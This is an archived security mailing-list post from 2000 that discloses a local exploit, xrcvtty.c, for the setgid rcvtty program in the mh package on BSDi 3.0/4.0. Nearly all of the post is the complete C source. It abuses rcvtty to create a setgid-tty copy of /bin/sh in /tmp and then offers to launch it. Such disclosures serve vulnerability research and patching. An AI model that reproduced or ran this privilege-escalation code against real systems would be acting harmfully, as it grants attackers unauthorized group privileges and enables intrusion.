|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: BSDi 3.0/4.0 rcvtty gid=tty exploit... (mh package)
From: Chris Sharp (v9
FAKEHALO.ORG)Date: Sun Nov 26 2000 - 21:04:00 CST
- Next message: Michel Kaempf: "[MSY] S(ecure)Locate heap corruption vulnerability"
- Previous message: Chris Kennedy: "PHP Phorum quick fix"
- Next in thread: Dan Harkless: "Re: BSDi 3.0/4.0 rcvtty gid=tty exploit... (mh package)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
well, i dont know if rcvtty is suppost to be
setgid in general, since ive never seen it setgid
on anything but BSDi 3.0 and 4.0. but
none-the-less, here is a exploit i wrote for it:
(original ver: http://realhalo.org/xrcvtty.c)
xrcvtty.c(modified from original):
----------------------------------
/* (BSDi3.0/4.0)rcvtty[mh] local exploit, by
v9[v9fakehalo.org]. gives gid=4(tty).
info: found/exploit by: v9[v9fakehalo.org].
*/
#define PATH "/usr/contrib/mh/lib/rcvtty"
#define MAKESHELL "/tmp/mksh.sh"
#define SGIDSHELL "/tmp/ttysh"
#define GIDTTY 4
#include <stdio.h>
#include <sys/stat.h>
main(){
char cmd[256],in[0];
struct stat mod1,mod2;
FILE *sgidexec;
fprintf(stderr,"[ (BSDi3.0/4.0)rcvtty[mh] local"
" exploit, by v9[v9fakehalo.org ]. ]\n\n");
if(stat(PATH,&mod1)){
fprintf(stderr,"[!] failed, %s doesnt appear to"
" exist.\n",PATH);
exit(1);
}
else
if(mod1.st_mode==34285&&mod1.st_gid==GIDTTY){
fprintf(stderr,"[*] %s appears to be setgid"
" tty(%d).\n",PATH,GIDTTY);
}
else{
fprintf(stderr,"[!] failed, %s isn't setgid"
" tty(%d).\n",PATH,GIDTTY);
exit(1);
}
fprintf(stderr,"[*] now making shell script to"
" execute.\n");
unlink(MAKESHELL);
sgidexec=fopen(MAKESHELL,"w");
fprintf(sgidexec,"#!/bin/sh\n");
fprintf(sgidexec,"cp /bin/sh %s\n",SGIDSHELL);
fprintf(sgidexec,"chgrp %d"
" %s\n",GIDTTY,SGIDSHELL);
fprintf(sgidexec,"chmod 2755 %s\n",SGIDSHELL);
fclose(sgidexec);
chmod(MAKESHELL,33261);
fprintf(stderr,"[*] done, now building and"
" executing the command line.\n");
snprintf(cmd,sizeof(cmd),"echo yes | %s %s"
" 1>/dev/null 2>&1",PATH,MAKESHELL);
system(cmd);
unlink(MAKESHELL);
fprintf(stderr,"[*] done, now checking for"
" success.\n");
if(stat(SGIDSHELL,&mod2)){
fprintf(stderr,"[!] failed, %s doesn't"
" exist.\n",SGIDSHELL);
exit(1);
}
else
if(mod2.st_mode==34285&&mod2.st_gid==GIDTTY){
fprintf(stderr,"[*] success, %s is now setgid"
" tty(%d).\n",SGIDSHELL,GIDTTY);
}
else{
fprintf(stderr,"[!] failed, %s isn't setgid"
" tty(%d).\n",SGIDSHELL,GIDTTY);
exit(1);
}
fprintf(stderr,"[*] finished, everything"
" appeared to have gone successful.\n");
fprintf(stderr,"[?] do you wish to enter the"
" sgidshell now(y/n)?: ");
scanf("%s",in);
if(in[0]!=0x59&&in[0]!=0x79){
printf("[*] ok, aborting execution, the shell"
" is: %s.\n",SGIDSHELL);
}
else{
printf("[*] ok, executing shell(%s) now.\n",
SGIDSHELL);
execl(SGIDSHELL,SGIDSHELL,0);
}
exit(0);
}
-- Vade79 -> v9
- Next message: Michel Kaempf: "[MSY] S(ecure)Locate heap corruption vulnerability"
- Previous message: Chris Kennedy: "PHP Phorum quick fix"
- Next in thread: Dan Harkless: "Re: BSDi 3.0/4.0 rcvtty gid=tty exploit... (mh package)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]